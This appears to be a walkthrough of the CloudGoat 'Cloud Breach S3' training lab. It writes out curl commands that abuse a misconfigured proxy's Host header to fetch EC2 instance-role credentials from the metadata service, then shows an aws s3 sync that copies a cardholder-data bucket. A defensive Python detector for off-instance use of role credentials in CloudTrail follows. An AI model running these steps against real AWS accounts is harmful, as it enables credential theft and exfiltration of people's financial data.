CloudGoat: Cloud Breach S3


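We are not given any users in this scenario, but we know the IP address of an EC2 instance that runs a misconfigured reverse proxy server. Because the proxy forwards requests according to the Host header, a request sent with Host: 169.254.169.254 is relayed to the instance metadata service. We will take the credentials of the instance role and use them to exfiltrate data from S3.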

Get Role from EC2

curl -s http://<ec2-ip-address>/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'

Result:

cg-banking-WAF-Role-cloud_breach_s3_###

This is the name of the role attached to the instance.

Get role credentials

curl -s http://<ec2-ip-address>/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_### -H 'Host:169.254.169.254'

Result:

{
  "AccessKeyId" : "<access-key-id>",
  "SecretAccessKey" : "<secret-access-key>",
  "Token" : "<session-token>"
}

To create an AWS CLI profile, see here.

In this post, I will use cg-banking as the profile name for the assumed role.

List S3 buckets

aws --profile cg-banking s3 ls

Result:

2024-03-17 16:03:00 cg-cardholder-data-bucket-cloud-breach-s3-###

Get PII data

To download all the data from S3 to our local computer, we sync a local folder with the S3 bucket:

aws --profile cg-banking s3 sync s3://cg-cardholder-data-bucket-cloud-breach-s3-### ./cardholder-data

List the files in the folder

ls cardholder-data

Result:

cardholder_data_primary.csv   cardholders_corporate.csv
cardholder_data_secondary.csv goat.png

🎇 All cardholder data are in our hands.
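
From the defender's side, the calls made with the cg-banking profile are visible in CloudTrail: the session name of an EC2 instance role is the instance ID, so the same credentials used from an address the instance does not own stand out. The following is an added example, not part of the original walkthrough; the account ID, instance ID, role suffix, IP addresses, inventory mapping and log records are all constructed assumptions.

```python
import ipaddress
import re

# EC2 role sessions are named after the instance that received the credentials.
INSTANCE_SESSION = re.compile(
    r":assumed-role/(?P<role>[^/]+)/(?P<instance>i-[0-9a-f]{8,17})$")

# Assumed inventory: addresses each instance legitimately calls AWS from.
INSTANCE_IPS = {"i-0123456789abcdef0": {"10.0.10.25", "198.51.100.10"}}

ROLE_ARN = ("arn:aws:sts::111122223333:assumed-role/"
            "cg-banking-WAF-Role-cloud_breach_s3_EXAMPLE/i-0123456789abcdef0")

# Constructed CloudTrail records, trimmed to the fields used; not real log data.
SAMPLE_EVENTS = [
    {"eventName": "ListBuckets", "sourceIPAddress": "203.0.113.50",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.10",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventName": "DescribeInstances", "sourceIPAddress": "ec2.amazonaws.com",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN}},
    {"eventName": "ListBuckets", "sourceIPAddress": "203.0.113.50",
     "userIdentity": {"type": "IAMUser",
                      "arn": "arn:aws:iam::111122223333:user/example-admin"}},
]

def is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def find_off_instance_use(events, inventory):
    """Return (role, instance, source_ip, event) for instance-role calls from foreign IPs."""
    findings = []
    for event in events:
        identity = event.get("userIdentity", {})
        match = INSTANCE_SESSION.search(identity.get("arn", ""))
        if identity.get("type") != "AssumedRole" or not match:
            continue  # not an EC2 instance-role session
        source = event.get("sourceIPAddress", "")
        if not is_ip(source):
            continue  # AWS services acting for the session log a DNS name here
        # An instance missing from the inventory has no allowed IPs, so it is flagged.
        if source not in inventory.get(match["instance"], set()):
            findings.append((match["role"], match["instance"], source, event["eventName"]))
    return findings

if __name__ == "__main__":
    print(find_off_instance_use(SAMPLE_EVENTS, INSTANCE_IPS))
```

ListBuckets is a management event, but the object reads performed by s3 sync are S3 data events and appear in CloudTrail only when data event logging is enabled for the bucket.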